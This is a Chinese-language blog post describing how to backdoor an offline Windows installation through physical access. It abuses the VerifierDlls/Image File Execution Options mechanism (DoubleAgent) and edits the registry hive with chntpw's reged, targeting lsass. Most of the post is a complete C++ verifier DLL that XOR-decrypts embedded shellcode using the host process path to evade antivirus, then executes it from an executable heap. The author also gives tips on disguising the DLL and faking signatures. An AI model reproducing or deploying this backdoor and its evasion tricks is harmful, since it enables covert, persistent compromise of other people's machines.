<!DOCTYPE html>
<html lang="zh" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="" />
  <meta name="author" content="DiamondHunters" />
  <meta name="description" content="" />
  
  
  <title>
    
      使用DoubleAgent与chntpw感染盘内windows系统 
      
      
      |
    
     Dia的记事本
  </title>

  
    <link rel="apple-touch-icon" href="/images/favicon.png">
    <link rel="icon" href="/images/favicon.png">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  
<link rel="stylesheet" href="/css/color-scheme.css">
<link rel="stylesheet" href="/css/base.css">
<link rel="stylesheet" href="/iconfont/iconfont.css">
<link rel="stylesheet" href="/css/github-markdown.css">
<link rel="stylesheet" href="/css/highlight.css">
<link rel="stylesheet" href="/css/comments.css">


  <!-- jquery3.3.1 -->
  <script src="https://cdn.bootcdn.net//ajax/libs/jquery/3.3.1/jquery.min.js"></script>

  <!-- fancybox -->
  <link href="https://cdn.bootcdn.net//ajax/libs/fancybox/3.5.2/jquery.fancybox.min.css" rel="stylesheet">
  <script async src="https://cdn.bootcdn.net//ajax/libs/fancybox/3.5.2/jquery.fancybox.min.js"></script>
  
<script src="/js/fancybox.js"></script>


  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
  <!---<script async src="//static.getclicky.com/101350277.js"></script>--->
<meta name="generator" content="Hexo 6.0.0"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/avatarMe.png" alt="">
      
    </a>
    <div class="nickname"><a href="/">Dia</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">Tags</a>
        </li>
      
        <li class="nav-item" data-path="/friends/">
          <a href="/friends/">Friends</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->

<!-- LaTex Display -->
<script src="https://polyfill.alicdn.com/polyfill.min.js?features=es6"></script>
<script type="text/javascript" id="MathJax-script" async
  src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-chtml.js">
</script>
<script>
MathJax = {
  tex: {
    inlineMath: [['$', '$'], ['\\(', '\\)']]
  }
};
</script>



  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">使用DoubleAgent与chntpw感染盘内windows系统</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime" title="Update time"></i>
          2023-07-17 12:03:06
        </span>
        
      </div>
      <div class="markdown-body">
        <p>近源后门植入多采用badusb等系统登录后或强制登陆后植入后门的方式，这种方式留痕较多且目标较为明显。</p>
<p>本文提供一种在物理接触下（进入PE系统，拆卸硬盘等）对盘内系统植入后门的方式（无全盘加密）</p>
<h3 id="DoubleAgent"><a href="#DoubleAgent" class="headerlink" title="DoubleAgent"></a>DoubleAgent</h3><h4 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h4><p><a target="_blank" rel="noopener" href="https://github.com/Cybellum/DoubleAgent">https://github.com/Cybellum/DoubleAgent</a></p>
<p>DoubleAgent is a new Zero-Day technique for injecting code and maintaining persistence on a machine (i.e. auto-run).<br>DoubleAgent 是一种新的零日技术，用于注入代码并维护机器上的持久性（即自动运行）。</p>
<p>DoubleAgent can exploit:<br>DoubleAgent 可以利用：</p>
<ul>
<li>Every Windows version (Windows XP to Windows 10)<br>每个 Windows 版本（Windows XP 到 Windows 10）</li>
<li>Every Windows architecture (x86 and x64)<br>每个 Windows 体系结构（x86 和 x64）</li>
<li>Every Windows user (SYSTEM/Admin/etc.)<br>每个 Windows 用户（系统/管理员/等）</li>
<li>Every target process, including privileged processes (OS/Antivirus/etc.)<br>每个目标进程，包括特权进程（操作系统/防病毒/等）</li>
</ul>
<p>DoubleAgent exploits a 15 years old legitimate feature of Windows and therefore cannot be patched.<br>DoubleAgent 利用了 Windows 15 年前的合法功能，因此无法修补。</p>
<h4 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h4><p>DoubleAgent利用了Windows提供的VerifierDll功能，通过修改注册表项将符合VerifierDll结构的DLL注入进任意进程</p>
<p>在</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xxx.exe</span><br></pre></td></tr></table></figure>

<p>中配置如下键值后：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&quot;GlobalFlag&quot;=&quot;0x100&quot;</span><br><span class="line">&quot;VerifierDlls&quot;=&quot;DoubleAgentDll.dll&quot;</span><br></pre></td></tr></table></figure>

<p>系统在启动xxx.exe时便会从system32下加载所配置名称的DLL。</p>
<h4 id="杀软防御"><a href="#杀软防御" class="headerlink" title="杀软防御"></a>杀软防御</h4><p>经测试杀软会拦截对该表项的操作，使其在杀软条件下存在利用问题。若在近源场景中可以对其进行放行。</p>
<h3 id="chntpw"><a href="#chntpw" class="headerlink" title="chntpw"></a>chntpw</h3><p>chntpw是一个古老的套件，其提供了windows注册表编辑的功能（经测试比较好用，可以直接导入注册表文件）</p>
<p>其提供了reged程序</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~# reged -h</span><br><span class="line">reged version 0.1 140201, (c) Petter N Hagen</span><br><span class="line"></span><br><span class="line">Modes:</span><br><span class="line">-x &lt;registryhivefile&gt; &lt;prefixstring&gt; &lt;key&gt; &lt;output.reg&gt;</span><br><span class="line">   Xport. Where &lt;prefixstring&gt; for example is HKEY_LOCAL_MACHINE\SOFTWARE</span><br><span class="line">   &lt;key&gt; is key to dump (recursively), \ or \\ means all keys in hive</span><br><span class="line">   Only one .reg and one hive file supported at the same time</span><br><span class="line">-I &lt;registryhivefile&gt; &lt;prefixstring&gt; &lt;input.reg&gt;</span><br><span class="line">   Import from .reg file. Where &lt;prefixstring&gt; for example is HKEY_LOCAL_MACHINE\SOFTWARE</span><br><span class="line">   Only one .reg and one hive file supported at the same time</span><br><span class="line">-e &lt;registryhive&gt; ...</span><br><span class="line">   Interactive edit one or more of registry files</span><br><span class="line"></span><br><span class="line">Options:</span><br><span class="line">-L : Log changed filenames to /tmp/changed, also auto-saves</span><br><span class="line">-C : Auto-save (commit) changed hives without asking</span><br><span class="line">-N : No allocate mode, only allow edit of existing values with same size</span><br><span class="line">-E : No expand mode, do not expand hive file (safe mode)</span><br><span class="line">-t : Debug trace of allocated blocks</span><br><span class="line">-v : Some more verbose messages</span><br></pre></td></tr></table></figure>

<p>（经测试可以编译windows版本并正常使用）</p>
<h3 id="整体利用"><a href="#整体利用" class="headerlink" title="整体利用"></a>整体利用</h3><p>介绍完上面两个科技想必大家都能猜出如何向盘内系统植入后门了</p>
<p>通过PE系统在目标机器上进行植入或拆下硬盘在自己设备上进行植入</p>
<ul>
<li>制作符合VerifierDll格式的后门（这里照着一些开源代码进行编写代码放在最后）</li>
<li>通过reged程序修改盘内系统注册表文件添加VerifierDlls</li>
<li>拷贝后门DLL</li>
</ul>
<p>如此即可不启动目标系统植入后门，但要注意敏感目录监控可能会捕获到拷贝进去的DLL文件</p>
<h4 id="注入工具"><a href="#注入工具" class="headerlink" title="注入工具"></a>注入工具</h4><p>只进行过手动安装验证，暂无工具</p>
<p>工具仅需要自动化完成</p>
<p>1.寻找存在windows的盘</p>
<p>2.调用 <code>reged -I &lt;registryhivefile&gt; &lt;prefixstring&gt; &lt;input.reg&gt;</code> </p>
<p>其中注册表路径（XP之后）为</p>
<p><code>Windows\system32\config\System</code></p>
<p>3.拷贝DLL文件</p>
<h4 id="注册表"><a href="#注册表" class="headerlink" title="注册表"></a>注册表</h4><p>可以使用DoubleAagent工具注入后导出注册表，也可以手动添加（这里选择lsass进程，权限高启动早通用性强）</p>
<h4 id="VerifierDll"><a href="#VerifierDll" class="headerlink" title="VerifierDll"></a>VerifierDll</h4><p>由于我们已知会被注入的进程名，所以通过获取进程名解密shellcode以躲避杀软的静态分析</p>
<p>DLL编译后还可以克隆一个windows的DLL的描述信息以假乱真。数字签名的问题就靠各显神通了，不过不是微软的签名被注意到了基本都无了，也可以想办法装个根证书欺骗一下，不过那就是另外的话题了。</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// dllmain.cpp : 定义 DLL 应用程序的入口点。</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&quot;pch.h&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;windows.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;winternl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&quot;shellcode.h&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> _NO_CRT_STDIO_INLINE 1</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> NOMINMAX</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> _CRT_SECURE_NO_WARNINGS</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> WIN32_NO_STATUS</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> WIN32_LEAN_AND_MEAN</span></span><br><span class="line"><span class="comment">// See AVRF.md to get how this thing works</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// Semi-private ntapi stuff</span></span><br><span class="line"></span><br><span class="line">EXTERN_C_START</span><br><span class="line"><span class="meta">#	<span class="meta-keyword">define</span> DebugPrint(str, ...) DbgPrintEx( 103u, 3u, <span class="meta-string">&quot;[RAT] &quot;</span> __FUNCTION__ <span class="meta-string">&quot;: &quot;</span> str, ## __VA_ARGS__)</span></span><br><span class="line"><span class="keyword">using</span> RTL_VERIFIER_DLL_LOAD_CALLBACK = <span class="built_in">VOID</span>(NTAPI*) (PWSTR DllName, PVOID DllBase, SIZE_T DllSize, PVOID Reserved);</span><br><span class="line"><span class="keyword">using</span> RTL_VERIFIER_DLL_UNLOAD_CALLBACK = <span class="built_in">VOID</span>(NTAPI*) (PWSTR DllName, PVOID DllBase, SIZE_T DllSize, PVOID Reserved);</span><br><span class="line"><span class="keyword">using</span> RTL_VERIFIER_NTDLLHEAPFREE_CALLBACK = <span class="built_in">VOID</span>(NTAPI*) (PVOID AllocationBase, SIZE_T AllocationSize);</span><br><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> _<span class="title">RTL_VERIFIER_THUNK_DESCRIPTOR</span> &#123;</span></span><br><span class="line">    PCSTR ThunkName;</span><br><span class="line">    PVOID ThunkOldAddress;</span><br><span class="line">    PVOID ThunkNewAddress;</span><br><span class="line">&#125; RTL_VERIFIER_THUNK_DESCRIPTOR, * PRTL_VERIFIER_THUNK_DESCRIPTOR;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> _<span class="title">RTL_VERIFIER_DLL_DESCRIPTOR</span> &#123;</span></span><br><span class="line">    PCWSTR  DllName;</span><br><span class="line">    DWORD   DllFlags;</span><br><span class="line">    PVOID   DllAddress;</span><br><span class="line">    PRTL_VERIFIER_THUNK_DESCRIPTOR  DllThunks;</span><br><span class="line">&#125; RTL_VERIFIER_DLL_DESCRIPTOR, * PRTL_VERIFIER_DLL_DESCRIPTOR;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> _<span class="title">RTL_VERIFIER_PROVIDER_DESCRIPTOR</span> &#123;</span></span><br><span class="line">    DWORD   Length;</span><br><span class="line">    PRTL_VERIFIER_DLL_DESCRIPTOR      ProviderDlls;</span><br><span class="line">    RTL_VERIFIER_DLL_LOAD_CALLBACK    ProviderDllLoadCallback;</span><br><span class="line">    RTL_VERIFIER_DLL_UNLOAD_CALLBACK  ProviderDllUnloadCallback;</span><br><span class="line">    PCWSTR  VerifierImage;</span><br><span class="line">    DWORD   VerifierFlags;</span><br><span class="line">    DWORD   VerifierDebug;</span><br><span class="line">    PVOID   RtlpGetStackTraceAddress;</span><br><span class="line">    PVOID   RtlpDebugPageHeapCreate;</span><br><span class="line">    PVOID   RtlpDebugPageHeapDestroy;</span><br><span class="line">    RTL_VERIFIER_NTDLLHEAPFREE_CALLBACK ProviderNtdllHeapFreeCallback;</span><br><span class="line">&#125; RTL_VERIFIER_PROVIDER_DESCRIPTOR, * PRTL_VERIFIER_PROVIDER_DESCRIPTOR;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">static</span> VOID NTAPI <span class="title">DllLoadCallback</span><span class="params">(PWSTR DllName, PVOID DllBase, SIZE_T DllSize, PVOID Reserved)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">static</span> RTL_VERIFIER_DLL_DESCRIPTOR s_dll_descriptors[] = &#123; &#123;&#125; &#125;;</span><br><span class="line"></span><br><span class="line"><span class="keyword">static</span> RTL_VERIFIER_PROVIDER_DESCRIPTOR s_provider_descriptor =</span><br><span class="line">&#123;</span><br><span class="line">  <span class="built_in"><span class="keyword">sizeof</span></span>(RTL_VERIFIER_PROVIDER_DESCRIPTOR),</span><br><span class="line">  s_dll_descriptors,</span><br><span class="line">  &amp;DllLoadCallback</span><br><span class="line">&#125;;</span><br><span class="line"><span class="meta">#<span class="meta-keyword">pragma</span> comment(lib, <span class="meta-string">&quot;ntdll.lib&quot;</span>)</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> NtCurrentProcess() (HANDLE(LONG_PTR(-1)))</span></span><br><span class="line"><span class="function">NTSYSAPI</span></span><br><span class="line"><span class="function">NTSTATUS</span></span><br><span class="line"><span class="function">NTAPI</span></span><br><span class="line"><span class="function"><span class="title">LdrDisableThreadCalloutsForDll</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    _In_  PVOID DllImageBase</span></span></span><br><span class="line"><span class="params"><span class="function">)</span></span>;</span><br><span class="line"><span class="function">NTSYSAPI</span></span><br><span class="line"><span class="function">ULONG</span></span><br><span class="line"><span class="function"><span class="title">DbgPrintEx</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    ULONG ComponentId,</span></span></span><br><span class="line"><span class="params"><span class="function">    ULONG Level,</span></span></span><br><span class="line"><span class="params"><span class="function">    PCSTR Format,</span></span></span><br><span class="line"><span class="params"><span class="function">    ...</span></span></span><br><span class="line"><span class="params"><span class="function">)</span></span>;</span><br><span class="line"><span class="function">EXTERN_C_END</span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">Xor</span><span class="params">(<span class="keyword">char</span>* key, <span class="keyword">unsigned</span> <span class="keyword">char</span>* dst, <span class="keyword">int</span> dstlen)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">size_t</span> keylen = <span class="built_in">strlen</span>(key);</span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i &lt; dstlen; i++) &#123;</span><br><span class="line">        *(dst + i) ^= key[i % keylen];</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function">VOID CALLBACK <span class="title">MyWaitCallback</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    PTP_CALLBACK_INSTANCE Instance,</span></span></span><br><span class="line"><span class="params"><span class="function">    PVOID                 Parameter,</span></span></span><br><span class="line"><span class="params"><span class="function">    PTP_WAIT              Wait,</span></span></span><br><span class="line"><span class="params"><span class="function">    TP_WAIT_RESULT        WaitResult</span></span></span><br><span class="line"><span class="params"><span class="function">)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// Instance, Parameter, Wait, and WaitResult not used in this example.</span></span><br><span class="line">    <span class="built_in">UNREFERENCED_PARAMETER</span>(Instance);</span><br><span class="line">    <span class="built_in">UNREFERENCED_PARAMETER</span>(Parameter);</span><br><span class="line">    <span class="built_in">UNREFERENCED_PARAMETER</span>(Wait);</span><br><span class="line">    <span class="built_in">UNREFERENCED_PARAMETER</span>(WaitResult);</span><br><span class="line">    <span class="keyword">char</span> exepath[<span class="number">128</span>];</span><br><span class="line">    DWORD pathlen = <span class="number">128</span>;</span><br><span class="line">    <span class="built_in">QueryFullProcessImageNameA</span>(<span class="built_in">GetCurrentProcess</span>(), <span class="number">0</span>, exepath, &amp;pathlen);</span><br><span class="line">    <span class="keyword">char</span> text[<span class="number">9</span>] = &#123; <span class="number">0x0a</span>,<span class="number">0x54</span>,<span class="number">0x36</span>,<span class="number">0x32</span>,<span class="number">0x0a</span>,<span class="number">0x1a</span>,<span class="number">0x01</span>,<span class="number">0x0b</span>,<span class="number">0x77</span> &#125;;</span><br><span class="line">    <span class="built_in">Xor</span>(exepath, (<span class="keyword">unsigned</span> <span class="keyword">char</span>*)text, <span class="number">9</span>);</span><br><span class="line">    <span class="comment">//MessageBoxA(0, text, &quot;My DLL Injected!&quot;, 0);</span></span><br><span class="line">    <span class="built_in">Xor</span>(exepath, shellcode, <span class="number">236614</span>);</span><br><span class="line">    LPVOID heapp = <span class="built_in">HeapCreate</span>(HEAP_CREATE_ENABLE_EXECUTE, <span class="number">0</span>, <span class="number">0</span>);</span><br><span class="line">    LPVOID ptr = <span class="built_in">HeapAlloc</span>(heapp, <span class="number">0</span>, <span class="number">409600</span>);</span><br><span class="line">    <span class="built_in">RtlMoveMemory</span>(ptr, shellcode, <span class="built_in"><span class="keyword">sizeof</span></span>(shellcode));</span><br><span class="line">    HANDLE hEvent;</span><br><span class="line">    hEvent = <span class="built_in">CreateEvent</span>(<span class="literal">NULL</span>, FALSE, FALSE, <span class="literal">NULL</span>);</span><br><span class="line">    PTP_WAIT ptp_w = <span class="built_in">CreateThreadpoolWait</span>((PTP_WAIT_CALLBACK)ptr, <span class="literal">NULL</span>, <span class="literal">NULL</span>);</span><br><span class="line">    <span class="built_in">SetThreadpoolWait</span>(ptp_w, hEvent, <span class="number">0</span>);</span><br><span class="line">    <span class="built_in">SetEvent</span>(hEvent);</span><br><span class="line">    <span class="built_in">WaitForThreadpoolWaitCallbacks</span>(ptp_w, FALSE);</span><br><span class="line">    <span class="built_in">SetEvent</span>(hEvent);</span><br><span class="line">    <span class="keyword">while</span> (TRUE)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">Sleep</span>(<span class="number">10000</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function">VOID <span class="title">waitPool</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="keyword">char</span> exepath[<span class="number">128</span>];</span><br><span class="line">    DWORD pathlen = <span class="number">128</span>;</span><br><span class="line">    <span class="built_in">QueryFullProcessImageNameA</span>(<span class="built_in">GetCurrentProcess</span>(), <span class="number">0</span>, exepath, &amp;pathlen);</span><br><span class="line">    <span class="keyword">char</span> code[<span class="number">18</span>] = &#123; <span class="number">0x16</span>,<span class="number">0x54</span>,<span class="number">0x2f</span>,<span class="number">0x27</span>,<span class="number">0x19</span>,<span class="number">0x01</span>,<span class="number">0x16</span>,<span class="number">0x1b</span>,<span class="number">0x57</span>,<span class="number">0x25</span>,<span class="number">0x39</span>,<span class="number">0x21</span>,<span class="number">0x0a</span>,<span class="number">0x1a</span>,<span class="number">0x1b</span>,<span class="number">0x0b</span>,<span class="number">0x4c</span>,<span class="number">0x33</span> &#125;;</span><br><span class="line">    <span class="built_in">Xor</span>(exepath, (<span class="keyword">unsigned</span> <span class="keyword">char</span> *)code, <span class="number">18</span>);</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">strcmp</span>(code, <span class="string">&quot;Unspport Version!&quot;</span>)) <span class="keyword">return</span>;</span><br><span class="line">    HANDLE hEvent = <span class="built_in">CreateEvent</span>(<span class="literal">NULL</span>, FALSE, FALSE, <span class="literal">NULL</span>);</span><br><span class="line">    PTP_WAIT ptp_w = <span class="built_in">CreateThreadpoolWait</span>((PTP_WAIT_CALLBACK)MyWaitCallback, <span class="literal">NULL</span>, <span class="literal">NULL</span>);</span><br><span class="line">    <span class="built_in">SetThreadpoolWait</span>(ptp_w, hEvent, <span class="number">0</span>);</span><br><span class="line">    <span class="built_in">SetEvent</span>(hEvent);</span><br><span class="line">    <span class="built_in">WaitForThreadpoolWaitCallbacks</span>(ptp_w, FALSE);</span><br><span class="line">    <span class="built_in">SetEvent</span>(hEvent);</span><br><span class="line">&#125;</span><br><span class="line"><span class="function">BOOL WINAPI <span class="title">DllMain</span><span class="params">( HMODULE hModule,</span></span></span><br><span class="line"><span class="params"><span class="function">                       DWORD  ul_reason_for_call,</span></span></span><br><span class="line"><span class="params"><span class="function">                       PRTL_VERIFIER_PROVIDER_DESCRIPTOR* provider</span></span></span><br><span class="line"><span class="params"><span class="function">                     )</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line"></span><br><span class="line">    <span class="built_in"><span class="keyword">switch</span></span> (ul_reason_for_call)</span><br><span class="line">    &#123;</span><br><span class="line">    <span class="keyword">case</span> DLL_PROCESS_ATTACH:</span><br><span class="line">        <span class="built_in">LdrDisableThreadCalloutsForDll</span>(hModule);</span><br><span class="line">        <span class="built_in">waitPool</span>();</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">case</span> <span class="number">4</span>:<span class="comment">//DLL_PROCESS_VERIFIER</span></span><br><span class="line">        *provider = &amp;s_provider_descriptor;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">case</span> DLL_THREAD_ATTACH:</span><br><span class="line">    <span class="keyword">case</span> DLL_THREAD_DETACH:</span><br><span class="line">    <span class="keyword">case</span> DLL_PROCESS_DETACH:</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> TRUE;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">static</span> VOID NTAPI <span class="title">DllLoadCallback</span><span class="params">(PWSTR DllName, PVOID DllBase, SIZE_T DllSize, PVOID Reserved)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="built_in">UNREFERENCED_PARAMETER</span>(DllSize);</span><br><span class="line">    <span class="built_in">UNREFERENCED_PARAMETER</span>(Reserved);</span><br><span class="line">    <span class="comment">//dll_loaded(DllBase, DllName);</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>


      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/2023/05/20/openvpn%E4%BD%9C%E4%B8%BA%E5%A4%87%E7%94%A8%E7%BA%BF%E8%B7%AF%E7%9A%84%E8%B7%AF%E7%94%B1%E9%85%8D%E7%BD%AE/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>Prev</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime" title="Update time"></i>
              2023-07-17 12:03:06
            </span>
            
          </div>
          <div class="post-foot-prev">
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">Contents</div>
    <div class="catalog-content">
      <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#DoubleAgent"><span class="toc-text">DoubleAgent</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BB%8B%E7%BB%8D"><span class="toc-text">介绍</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%8E%9F%E7%90%86"><span class="toc-text">原理</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%9D%80%E8%BD%AF%E9%98%B2%E5%BE%A1"><span class="toc-text">杀软防御</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#chntpw"><span class="toc-text">chntpw</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%95%B4%E4%BD%93%E5%88%A9%E7%94%A8"><span class="toc-text">整体利用</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%B3%A8%E5%85%A5%E5%B7%A5%E5%85%B7"><span class="toc-text">注入工具</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%B3%A8%E5%86%8C%E8%A1%A8"><span class="toc-text">注册表</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#VerifierDll"><span class="toc-text">VerifierDll</span></a></li></ol></li></ol>
